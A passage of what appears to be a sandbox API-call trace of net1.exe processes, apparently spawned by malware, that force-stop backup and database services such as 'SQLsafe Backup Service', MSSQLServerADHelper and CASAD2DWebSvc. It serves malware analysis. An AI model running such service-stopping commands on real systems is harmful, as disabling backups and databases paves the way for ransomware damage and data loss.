0x14 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x14 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x15 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x15 [0126.656] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.656] LocalFree (hMem=0x5f9508) returned 0x0 [0126.656] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x16 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x11 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x14 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x12 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0xf [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x17 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x18 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x2a [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0126.657] LocalFree (hMem=0x5f9508) returned 0x0 [0126.657] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x27f7c0, nSize=0x0, Arguments=0x27f7bc | out: lpBuffer="锈_⡋盺'锈_'") returned 0x15 [0126.657] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0126.657] GetFileType (hFile=0x0) returned 0x0 [0126.657] GetConsoleOutputCP () returned 0x1b5 [0126.657] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0126.657] malloc (_Size=0x16) returned 0x3026c8 [0126.657] GetConsoleOutputCP () returned 0x1b5 [0126.658] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x3026c8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0126.658] WriteFile (in: hFile=0x0, lpBuffer=0x3026c8, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x27f7dc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f7dc, lpOverlapped=0x0) returned 0 [0126.658] free (_Block=0x3026c8) [0126.658] LocalFree (hMem=0x5f9508) returned 0x0 [0126.658] NetApiBufferFree (Buffer=0x5f1b10) returned 0x0 [0126.658] NetApiBufferFree (Buffer=0x5f1b28) returned 0x0 [0126.658] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “SQLsafe Backup Service” /y" [0126.658] exit (_Code=1) Process: id = "296" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4e407000" os_pid = "0x1260" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "137" os_parent_pid = "0xf34" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 702 os_tid = 0xe00 [0126.985] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f994 | out: lpSystemTimeAsFileTime=0x12f994*(dwLowDateTime=0x1f6e3e30, dwHighDateTime=0x1d6f0d1)) [0126.985] GetCurrentProcessId () returned 0x1260 [0126.985] GetCurrentThreadId () returned 0xe00 [0126.985] GetTickCount () returned 0x1152fb8 [0126.985] QueryPerformanceCounter (in: lpPerformanceCount=0x12f98c | out: lpPerformanceCount=0x12f98c*=24608574890) returned 1 [0126.985] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.985] __set_app_type (_Type=0x1) [0126.985] __p__fmode () returned 0x770331f4 [0126.985] __p__commode () returned 0x770331fc [0126.985] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.986] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.986] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.986] GetConsoleOutputCP () returned 0x1b5 [0126.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.986] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.989] sprintf_s (in: _DstBuf=0x12f94c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.990] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.992] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0126.992] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.992] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y" [0126.992] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f718, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.992] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x7a) returned 0x2e3af0 [0126.992] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.992] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12f91c | out: Buffer=0x12f91c*=0x2e1af8) returned 0x0 [0126.992] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12f91c | out: Buffer=0x12f91c*=0x2e1b10) returned 0x0 [0126.992] _fileno (_File=0x77032900) returned -2 [0126.992] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.992] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.992] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.992] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.992] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.992] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.993] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.993] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.993] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.993] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.993] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.993] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.993] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.993] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.993] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.993] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.993] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.993] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.993] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.993] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.993] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.993] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.993] _wcsicmp (_String1="accounts", _String2="MSSQLServerADHelper") returned -12 [0126.993] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper") returned -10 [0126.993] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper") returned -10 [0126.993] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper") returned -10 [0126.993] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper") returned -10 [0126.993] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper") returned -7 [0126.993] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper") returned -7 [0126.993] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper") returned -6 [0126.993] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper") returned -6 [0126.993] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper") returned -5 [0126.993] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper") returned -5 [0126.993] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper") returned -1 [0126.993] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper") returned 3 [0126.993] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper") returned 6 [0126.993] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper") returned 6 [0126.993] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper") returned 6 [0126.993] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper") returned 6 [0126.993] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper") returned 6 [0126.993] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper") returned 6 [0126.993] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper") returned 6 [0126.994] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper") returned 6 [0126.994] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper") returned 7 [0126.994] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper") returned 8 [0126.994] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper") returned 8 [0126.994] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper") returned -12 [0126.994] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper") returned -14 [0126.994] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper") returned 5 [0126.994] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper") returned 5 [0126.994] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper") returned 1 [0126.994] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper") returned 5 [0126.994] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper") returned 5 [0126.994] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper") returned 5 [0126.994] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper") returned 10 [0126.994] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper") returned 10 [0126.994] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper") returned 10 [0126.994] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper") returned 3 [0126.994] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper") returned -9 [0126.994] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper") returned -1 [0126.994] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper") returned 6 [0126.994] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper") returned 6 [0126.994] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper") returned 6 [0126.994] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper") returned -1 [0126.994] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper") returned -12 [0126.994] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper") returned 1 [0126.994] _wcsupr (in: _String="MSSQLServerADHelper" | out: _String="MSSQLSERVERADHELPER") returned="MSSQLSERVERADHELPER" [0126.994] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e54d0 [0127.393] GetServiceKeyNameW (in: hSCManager=0x2e54d0, lpDisplayName="MSSQLSERVERADHELPER", lpServiceName=0xe5aaf0, lpcchBuffer=0x12f8b8 | out: lpServiceName="", lpcchBuffer=0x12f8b8) returned 0 [0127.393] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER") returned -12 [0127.393] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER") returned -14 [0127.393] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER") returned 5 [0127.393] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER") returned 5 [0127.394] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER") returned 5 [0127.394] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER") returned 5 [0127.394] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER") returned 5 [0127.394] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER") returned 10 [0127.394] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER") returned 10 [0127.394] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER") returned 10 [0127.394] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER") returned 3 [0127.394] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER") returned -9 [0127.394] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER") returned -1 [0127.394] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER") returned 6 [0127.394] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER") returned 6 [0127.394] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER") returned 6 [0127.394] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER") returned -1 [0127.394] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER") returned -12 [0127.394] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER") returned 1 [0127.394] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER", opcode=0x0, arg=0x0, bufptr=0x12f8b4 | out: bufptr=0x12f8b4) returned 0x889 [0127.395] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0127.395] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0127.396] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0127.397] GetFileType (hFile=0x0) returned 0x0 [0127.397] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2e3ef0 [0127.397] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2e3ef0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n-", lpUsedDefaultChar=0x0) returned 30 [0127.397] WriteFile (in: hFile=0x0, lpBuffer=0x2e3ef0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12f7f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f7f4, lpOverlapped=0x0) returned 0 [0127.397] LocalFree (hMem=0x2e3ef0) returned 0x0 [0127.398] GetFileType (hFile=0x0) returned 0x0 [0127.398] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6198 [0127.398] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0127.398] WriteFile (in: hFile=0x0, lpBuffer=0x2e6198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f7f4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f7f4, lpOverlapped=0x0) returned 0 [0127.398] LocalFree (hMem=0x2e6198) returned 0x0 [0127.398] _ultow (in: _Dest=0x889, _Radix=1243172 | out: _Dest=0x889) returned="2185" [0127.398] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0127.398] GetFileType (hFile=0x0) returned 0x0 [0127.398] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2e6198 [0127.398] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2e6198, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0127.398] WriteFile (in: hFile=0x0, lpBuffer=0x2e6198, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12f800, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f800, lpOverlapped=0x0) returned 0 [0127.398] LocalFree (hMem=0x2e6198) returned 0x0 [0127.398] GetFileType (hFile=0x0) returned 0x0 [0127.398] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6198 [0127.398] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0127.398] WriteFile (in: hFile=0x0, lpBuffer=0x2e6198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12f800, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12f800, lpOverlapped=0x0) returned 0 [0127.398] LocalFree (hMem=0x2e6198) returned 0x0 [0127.399] NetApiBufferFree (Buffer=0x2e1af8) returned 0x0 [0127.399] NetApiBufferFree (Buffer=0x2e1b10) returned 0x0 [0127.399] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y" [0127.399] exit (_Code=2) Process: id = "297" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x50186000" os_pid = "0x1098" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "148" os_parent_pid = "0x1004" cmd_line = "C:\\Windows\\system32\\net1 stop CASAD2DWebSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 703 os_tid = 0x1248 [0126.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfb34 | out: lpSystemTimeAsFileTime=0xcfb34*(dwLowDateTime=0x1ef99ad0, dwHighDateTime=0x1d6f0d1)) [0126.230] GetCurrentProcessId () returned 0x1098 [0126.230] GetCurrentThreadId () returned 0x1248 [0126.230] GetTickCount () returned 0x1152cbc [0126.230] QueryPerformanceCounter (in: lpPerformanceCount=0xcfb2c | out: lpPerformanceCount=0xcfb2c*=24533102795) returned 1 [0126.230] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.230] __set_app_type (_Type=0x1) [0126.230] __p__fmode () returned 0x770331f4 [0126.231] __p__commode () returned 0x770331fc [0126.231] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.231] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.231] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.231] GetConsoleOutputCP () returned 0x1b5 [0126.231] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.231] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.235] sprintf_s (in: _DstBuf=0xcfaec, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.235] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.237] GetStdHandle (nStdHandle=0xfffffff5) returned 0x47c [0126.237] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.237] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop CASAD2DWebSvc /y" [0126.237] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf8b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.237] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6e) returned 0x423ae0 [0126.237] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.237] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfabc | out: Buffer=0xcfabc*=0x421ae8) returned 0x0 [0126.237] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfabc | out: Buffer=0xcfabc*=0x421b00) returned 0x0 [0126.237] _fileno (_File=0x77032900) returned -2 [0126.237] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.237] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0126.237] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.237] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.237] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.237] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.238] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.238] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.238] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.238] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.238] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.238] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.238] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.238] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.238] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.238] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.238] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.238] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.238] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.238] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.238] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.238] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.238] _wcsicmp (_String1="accounts", _String2="CASAD2DWebSvc") returned -2 [0126.238] _wcsicmp (_String1="computer", _String2="CASAD2DWebSvc") returned 14 [0126.238] _wcsicmp (_String1="config", _String2="CASAD2DWebSvc") returned 14 [0126.238] _wcsicmp (_String1="continue", _String2="CASAD2DWebSvc") returned 14 [0126.238] _wcsicmp (_String1="cont", _String2="CASAD2DWebSvc") returned 14 [0126.238] _wcsicmp (_String1="file", _String2="CASAD2DWebSvc") returned 3 [0126.238] _wcsicmp (_String1="files", _String2="CASAD2DWebSvc") returned 3 [0126.238] _wcsicmp (_String1="group", _String2="CASAD2DWebSvc") returned 4 [0126.238] _wcsicmp (_String1="groups", _String2="CASAD2DWebSvc") returned 4 [0126.238] _wcsicmp (_String1="help", _String2="CASAD2DWebSvc") returned 5 [0126.238] _wcsicmp (_String1="helpmsg", _String2="CASAD2DWebSvc") returned 5 [0126.238] _wcsicmp (_String1="localgroup", _String2="CASAD2DWebSvc") returned 9 [0126.238] _wcsicmp (_String1="pause", _String2="CASAD2DWebSvc") returned 13 [0126.238] _wcsicmp (_String1="session", _String2="CASAD2DWebSvc") returned 16 [0126.238] _wcsicmp (_String1="sessions", _String2="CASAD2DWebSvc") returned 16 [0126.238] _wcsicmp (_String1="sess", _String2="CASAD2DWebSvc") returned 16 [0126.238] _wcsicmp (_String1="share", _String2="CASAD2DWebSvc") returned 16 [0126.238] _wcsicmp (_String1="start", _String2="CASAD2DWebSvc") returned 16 [0126.238] _wcsicmp (_String1="stats", _String2="CASAD2DWebSvc") returned 16 [0126.238] _wcsicmp (_String1="statistics", _String2="CASAD2DWebSvc") returned 16 [0126.239] _wcsicmp (_String1="stop", _String2="CASAD2DWebSvc") returned 16 [0126.239] _wcsicmp (_String1="time", _String2="CASAD2DWebSvc") returned 17 [0126.239] _wcsicmp (_String1="user", _String2="CASAD2DWebSvc") returned 18 [0126.239] _wcsicmp (_String1="users", _String2="CASAD2DWebSvc") returned 18 [0126.239] _wcsicmp (_String1="msg", _String2="CASAD2DWebSvc") returned 10 [0126.239] _wcsicmp (_String1="messenger", _String2="CASAD2DWebSvc") returned 10 [0126.239] _wcsicmp (_String1="receiver", _String2="CASAD2DWebSvc") returned 15 [0126.239] _wcsicmp (_String1="rcv", _String2="CASAD2DWebSvc") returned 15 [0126.239] _wcsicmp (_String1="netpopup", _String2="CASAD2DWebSvc") returned 11 [0126.239] _wcsicmp (_String1="redirector", _String2="CASAD2DWebSvc") returned 15 [0126.239] _wcsicmp (_String1="redir", 